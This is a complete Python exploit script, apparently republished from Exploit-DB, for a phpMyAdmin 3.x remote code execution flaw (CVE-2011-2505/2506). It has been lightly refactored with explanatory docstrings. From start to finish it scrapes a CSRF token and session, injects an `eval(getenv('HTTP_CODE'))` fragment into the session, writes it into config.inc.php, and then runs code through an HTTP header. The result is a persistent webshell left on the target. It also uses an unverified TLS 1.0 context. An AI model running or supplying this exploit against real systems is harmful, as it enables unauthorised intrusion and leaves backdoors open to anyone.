phpMyAdmin3 (pma3) - Remote Code Execution - CVE-2011-2505, CVE-2011-2506 (https://www.exploit-db.com/exploits/17510/): Fixes urlopen SSL 'Version too Low' errors
#!/usr/bin/env python | |
# coding=utf-8 | |
# pma3 - phpMyAdmin3 remote code execute exploit | |
# Author: wofeiwo<wofeiwo@80sec.com> | |
# Thx Superhei | |
# Tested on: 3.1.1, 3.2.1, 3.4.3 | |
# CVE: CVE-2011-2505, CVE-2011-2506 | |
# Date: 2011-07-08 | |
# Have fun, but do NOT use this against systems you are not explicitly authorized to test.
################################################ | |
# Requirements: 1. A "config" directory must exist inside the phpMyAdmin directory and be writable by the web server.
#               2. session.auto_start = 1 must be set in the target's php.ini.
import os,sys,urllib2,re,ssl | |
# One TLS context shared by every request this tool makes.  It is pinned to
# TLS 1.0 on purpose: the phpMyAdmin 3.x-era hosts this targets frequently speak
# nothing newer, and (presumably) that is the "Version too Low" handshake error
# the gist title says this works around.  The flip side is that a host which has
# disabled TLS 1.0 will refuse the handshake outright.
# NOTE(review): a bare SSLContext performs no certificate verification by
# default -- acceptable for a pentest tool that expects self-signed certs, but
# do not copy this context into anything that talks to a host you trust.
_TLS_PROTOCOL = ssl.PROTOCOL_TLSv1
gcontext = ssl.SSLContext(protocol=_TLS_PROTOCOL)
def usage(program):
    """Print the command-line help for this tool and exit with status 0.

    program: the script name shown in the usage lines (normally sys.argv[0]).
    """
    help_lines = (
        "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit",
        "Usage: %s <PMA_url>" % program,
        "Example: %s http://www.test.com/phpMyAdmin" % program,
    )
    for line in help_lines:
        print(line)
    sys.exit(0)
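# Seconds to wait on each HTTP request.  The original issued every request
# without a timeout, so a firewalled or hung host stalled the tool forever.
_REQUEST_TIMEOUT = 30


def _build_opener():
    """Return one OpenerDirector whose HTTPS handler uses the module TLS context.

    Why not urllib2.urlopen(url, context=gcontext)?  In Python 2.7.9+ passing
    `context=` makes urlopen() build a brand-new opener for that call and ignore
    whatever install_opener() registered -- so the Cookie and Code headers the
    original appended to its installed opener were never actually sent.
    Attaching the context to an HTTPSHandler on a single opener and calling
    that opener's open() directly is what carries the headers to the target.
    """
    return urllib2.build_opener(urllib2.HTTPSHandler(context=gcontext))


def _fetch_token_and_session(opener, base):
    """Step 1: scrape the anti-CSRF token and the session id from /index.php.

    Depending on the phpMyAdmin build the values show up either as query
    parameters (token=..., phpMyAdmin=...) or as hidden form inputs, so both
    shapes are tried.  Returns (token, sessionid); exits with status -1 when
    either cannot be found, as the original did.
    """
    print("[+] Trying get form token&session_id..")
    content = opener.open(base + "/index.php", timeout=_REQUEST_TIMEOUT).read()
    tokens = (re.findall(r"token=(\w{32})", content)
              or re.findall(r'token" value="(\w{32})"', content))
    sessions = (re.findall(r"phpMyAdmin=(\w{32,40})", content)
                or re.findall(r'phpMyAdmin" value="(\w{32,40})"', content))
    if not tokens or not sessions:
        print("[-] Cannot find form token and session id...exit.")
        sys.exit(-1)
    return tokens[0], sessions[0]


def _inject_session_payload(opener, base):
    """Step 2: write attacker-chosen keys into $_SESSION via swekey.auth.lib.php.

    The request parameters `_SESSION[ConfigFile*][Servers][<key>][host]` plant a
    server entry whose array key is the PHP fragment
    `*/eval(getenv('HTTP_CODE'));/*`.  When setup later serialises the session
    into config.inc.php (step 3) that key ends up in the generated file, which
    is how the fragment becomes executable (CVE-2011-2505 session manipulation
    feeding the CVE-2011-2506 config injection).
    `opener` must already carry the session cookie (set in main()).
    """
    print("[+] Trying to insert payload in $_SESSION..")
    uri = ("/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere"
           "&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
           "&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA")
    opener.open(base + uri, timeout=_REQUEST_TIMEOUT)


def _save_config(opener, base, sessionid, token):
    """Step 3: POST to setup/config.php so the poisoned session is saved to disk.

    `token` is the anti-CSRF value scraped in step 1; the session cookie is
    already attached to `opener`.  This is the step that leaves a modified
    config/config.inc.php on the target (see the note in main()).
    """
    print("[+] Trying get webshell..")
    postdata = ("phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en"
                "&ServerDefault=0&eol=unix&submit_save=Save") % (sessionid, token)
    opener.open(base + "/setup/config.php", postdata, timeout=_REQUEST_TIMEOUT)
    print("[+] All done, pray for your lucky!")


def _probe_shell(opener, base):
    """Step 4: request config/config.inc.php with `Code: phpinfo();` and parse it.

    The planted fragment evaluates whatever arrives in the HTTP `Code` header;
    phpinfo() is used only as a proof of execution.  Returns the 'System' row
    of the phpinfo() table, or None when the response does not look like
    phpinfo() output (the regex is anchored on phpinfo()'s HTML layout).
    """
    url = base + "/config/config.inc.php"
    opener.addheaders.append(('Code', 'phpinfo();'))
    print("[+] Trying connect shell: %s" % url)
    body = opener.open(url, timeout=_REQUEST_TIMEOUT).read()
    result = re.findall(r'System </td><td class="v">(.*)</td></tr>', body)
    if len(result) == 1:
        return result[0]
    return None


def main(args):
    """Drive the four exploitation steps against args[1], the phpMyAdmin base URL.

    args: sys.argv-style list; args[1] may or may not end with "/".
    Prints progress markers as it goes.  Any unexpected exception is printed
    and the process exits with status 1 (the original printed it and exited 0,
    which made failures indistinguishable from success in scripts).

    Operational caveats for an authorised test:
      * Step 3 writes a config/config.inc.php containing
        `eval(getenv('HTTP_CODE'))` onto the target.  That file does not go
        away when this tool exits, and the fragment performs no check of its
        own on who sends the `Code:` header -- remove the file when the
        engagement is over.
      * Requires the write-able "config" directory and session.auto_start=1
        listed in the file header; without them the steps silently do nothing.
    """
    try:
        if len(args) < 2:
            usage(args[0])
        base = args[1].rstrip("/")
        opener = _build_opener()
        token, sessionid = _fetch_token_and_session(opener, base)
        print("[+] Token: %s , SessionID: %s" % (token, sessionid))
        # The scraped id is sent under both cookie names, presumably so the
        # target resumes the same session whichever session name it uses.
        # Every later request through this opener carries it.
        opener.addheaders.append(('Cookie',
            'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;'
            % (sessionid, sessionid)))
        _inject_session_payload(opener, base)
        _save_config(opener, base, sessionid, token)
        system_info = _probe_shell(opener, base)
        if system_info is None:
            print("[-] Cannot get webshell.")
        else:
            print("[+] Lucky u! System info: %s" % system_info)
            print("[+] Shellcode is: eval(getenv('HTTP_CODE'));")
    except Exception as e:
        print(e)
        sys.exit(1)


if __name__ == "__main__":
    main(sys.argv)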